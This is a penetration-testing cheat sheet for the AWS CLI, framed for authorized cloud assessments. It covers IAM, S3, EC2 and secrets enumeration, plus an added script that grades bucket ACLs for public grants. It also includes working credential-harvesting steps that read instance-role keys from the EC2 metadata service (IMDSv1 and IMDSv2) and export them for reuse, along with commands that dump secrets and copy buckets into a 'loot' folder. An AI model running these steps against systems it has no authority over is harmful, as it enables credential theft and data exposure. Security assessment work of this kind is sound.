AWS CLI Cheat Sheet
Command-line interface for AWS enumeration, credential validation, and misconfiguration discovery during cloud assessments.
Overview
The AWS CLI interacts with all major AWS APIs. In pentests, use it after obtaining access keys, instance roles, or SSRF-to-metadata to enumerate S3, IAM, EC2, Lambda, and secrets.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Install
```bash
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o awscliv2.zip
unzip awscliv2.zip && sudo ./aws/install
aws --version
```
Configure profile
```bash
aws configure
```
Essential commands
Verify identity
```bash
aws sts get-caller-identity
```
List S3 buckets
```bash
aws s3 ls
```
List EC2 instances (one region; the all-regions loop is under Common workflows)
```bash
aws ec2 describe-instances --region us-east-1
```
Download bucket
```bash
aws s3 sync s3://bucket-name ./loot/ --no-sign-request   # --no-sign-request only if the bucket is public
```
Common workflows
On compromised EC2 (IMDSv1)
```bash
# list the role name(s) behind the instance profile
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
# fetch the temporary credentials (AccessKeyId, SecretAccessKey, Token) for that role
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE
export AWS_ACCESS_KEY_ID=...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
aws sts get-caller-identity
```
IAM enumeration
```bash
aws iam list-users
aws iam list-roles
aws iam list-attached-user-policies --user-name USER
# POLICY is the name of an inline policy on the user
aws iam get-user-policy --user-name USER --policy-name POLICY
# account ID must be the 12-digit form
aws iam simulate-principal-policy --policy-source-arn arn:aws:iam::123456789012:user/USER \
  --action-names s3:GetObject iam:CreateUser --resource-arns '*'
```
S3 misconfiguration
```bash
aws s3 ls s3://target-bucket/
aws s3api get-bucket-acl --bucket target-bucket
aws s3api get-bucket-policy --bucket target-bucket
aws s3 cp s3://target-bucket/secret.zip .
```
Multi-region EC2 / Lambda
```bash
for r in $(aws ec2 describe-regions --query 'Regions[].RegionName' --output text); do
  echo "=== $r ==="
  aws ec2 describe-instances --region "$r" --query 'Reservations[].Instances[].PublicIpAddress'
done
aws lambda list-functions --region us-east-1
```
Secrets Manager / SSM
```bash
aws secretsmanager list-secrets --region us-east-1
aws secretsmanager get-secret-value --secret-id prod/db/password
aws ssm describe-parameters --region us-east-1
aws ssm get-parameter --name /app/key --with-decryption
```
Flags reference
| Flag | Purpose |
|---|---|
| --profile NAME | Use named profile |
| --region REGION | Override default region |
| --output json\|table\|text | Output format |
| --query JMESPath | Filter output |
| --no-sign-request | Unsigned request (public S3 only) |
| AWS_PROFILE / AWS_DEFAULT_REGION | Environment overrides |
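The S3 misconfiguration workflow above tells you to pull the bucket ACL, but reading the Grants list by eye is error-prone. The following is an added example, not code from the original cheat sheet: a shell function that takes `aws s3api get-bucket-acl` JSON on stdin and prints every grant made to the AllUsers (anonymous) or AuthenticatedUsers (any AWS account) group. The ACL JSON at the bottom is constructed for the example; the function names and the `sed`/`grep`-only parsing are this example's own choices so that it works on a box without `jq`.

```shell
#!/usr/bin/env bash
# Added example: grade an S3 bucket ACL for public grants.
# Grantee.Type "Group" with one of these URIs means public access via the ACL.
ALL_USERS='http://acs.amazonaws.com/groups/global/AllUsers'
AUTH_USERS='http://acs.amazonaws.com/groups/global/AuthenticatedUsers'

# Reads get-bucket-acl JSON on stdin. Prints "<group> <permission>" per public
# grant. Returns 0 if at least one public grant exists, 1 otherwise.
acl_public_grants() {
  local out
  # Flatten whitespace so each grant becomes "Grantee":{...},"Permission":"X"
  # and can be pulled out with a single grep -o.
  out=$(tr -d '\n ' |
        grep -oE '"Grantee":[{][^}]*[}],"Permission":"[A-Z_]+"' |
        while IFS= read -r g; do
          case "$g" in
            *"$ALL_USERS"*)  group=AllUsers ;;
            *"$AUTH_USERS"*) group=AuthenticatedUsers ;;
            *) continue ;;   # canonical users / log delivery etc. are not public
          esac
          perm=$(printf '%s' "$g" | sed -n 's/.*"Permission":"\([A-Z_]*\)".*/\1/p')
          printf '%s %s\n' "$group" "$perm"
        done)
  [ -n "$out" ] || return 1
  printf '%s\n' "$out"
}

# Live usage (needs credentials with s3:GetBucketAcl):
check_bucket_acl() {
  aws s3api get-bucket-acl --bucket "$1" --output json | acl_public_grants
}

# Constructed sample in the shape the CLI returns (IDs/names are placeholders).
SAMPLE_ACL='{
    "Owner": { "DisplayName": "owner", "ID": "0000" },
    "Grants": [
        {
            "Grantee": { "DisplayName": "owner", "ID": "0000", "Type": "CanonicalUser" },
            "Permission": "FULL_CONTROL"
        },
        {
            "Grantee": { "Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers" },
            "Permission": "READ"
        },
        {
            "Grantee": { "Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" },
            "Permission": "WRITE"
        }
    ]
}'
```

Run `check_bucket_acl target-bucket` against a bucket you are authorized to test. A public grant in the ACL is a finding, but it is not proof of reachability: S3 Block Public Access (`aws s3api get-public-access-block --bucket NAME`) can override ACL grants, so confirm with an unsigned request (`aws s3 ls s3://NAME --no-sign-request`) before reporting the bucket as open.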
Tips
- Run Pacu or Prowler once the CLI confirms valid credentials; they automate the deeper privilege and misconfiguration checks.
- IMDSv2 requires a session token obtained with a PUT request and sent back in the X-aws-ec2-metadata-token header, so it is out of reach for simple GET-only SSRF.
- aws iam get-account-authorization-details dumps all users, groups, roles and their policies in one large JSON document.
- CloudTrail may log every CLI call, including sts get-caller-identity, so stay inside the agreed scope and rules of engagement.
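The IMDSv1 workflow above hand-copies three values out of the credential JSON into environment variables, and the IMDSv2 tip notes the extra token step. The following is an added example, not code from the original cheat sheet, that does both: it fetches an IMDSv2 token, pulls the role credentials with it, and converts the credential JSON into `export` lines the AWS CLI will pick up. The credential JSON at the bottom is a constructed sample in the documented response shape; the function names and the `sed`-only parsing (no `jq`) are this example's own assumptions.

```shell
#!/usr/bin/env bash
# Added example: IMDSv2 credential pull plus JSON-to-env conversion.
IMDS="http://169.254.169.254"

# Step 1 of IMDSv2: obtain a short-lived session token via PUT.
imds_token() {
  curl -s -X PUT "$IMDS/latest/api/token" \
       -H "X-aws-ec2-metadata-token-ttl-seconds: 300"
}

# Step 2: present the token on every metadata read. Prints the credential JSON.
imds_role_creds() {
  local tok role
  tok=$(imds_token) || return 1
  role=$(curl -s -H "X-aws-ec2-metadata-token: $tok" \
         "$IMDS/latest/meta-data/iam/security-credentials/") || return 1
  curl -s -H "X-aws-ec2-metadata-token: $tok" \
       "$IMDS/latest/meta-data/iam/security-credentials/$role"
}

# Pull one top-level string field out of the flat credential JSON on stdin.
json_field() {
  tr -d '\n' | sed -n "s/.*\"$1\"[[:space:]]*:[[:space:]]*\"\([^\"]*\)\".*/\1/p"
}

# Credential JSON on stdin -> export lines for the CLI. Fails (status 1) if any
# of the three values is missing, so a truncated or error response is not
# silently turned into empty variables.
imds_creds_to_env() {
  local json ak sk st
  json=$(cat)
  ak=$(printf '%s' "$json" | json_field AccessKeyId)
  sk=$(printf '%s' "$json" | json_field SecretAccessKey)
  st=$(printf '%s' "$json" | json_field Token)
  [ -n "$ak" ] && [ -n "$sk" ] && [ -n "$st" ] || return 1
  printf 'export AWS_ACCESS_KEY_ID=%s\n' "$ak"
  printf 'export AWS_SECRET_ACCESS_KEY=%s\n' "$sk"
  printf 'export AWS_SESSION_TOKEN=%s\n' "$st"
}

# Constructed sample in the IMDS response shape (all values are placeholders).
SAMPLE_CREDS='{
  "Code" : "Success",
  "LastUpdated" : "2024-01-01T00:00:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAEXAMPLEKEY",
  "SecretAccessKey" : "examplesecret",
  "Token" : "exampletoken",
  "Expiration" : "2024-01-01T06:00:00Z"
}'

# On a real instance (in scope only):  eval "$(imds_role_creds | imds_creds_to_env)"
# then confirm with:                    aws sts get-caller-identity
```

The token dance is the reason a plain GET-only SSRF cannot reach IMDSv2: the attacker needs to issue a PUT with a custom header and then replay the returned token in a second request. Note that the credentials are temporary (see the Expiration field), so re-run the pull when they lapse.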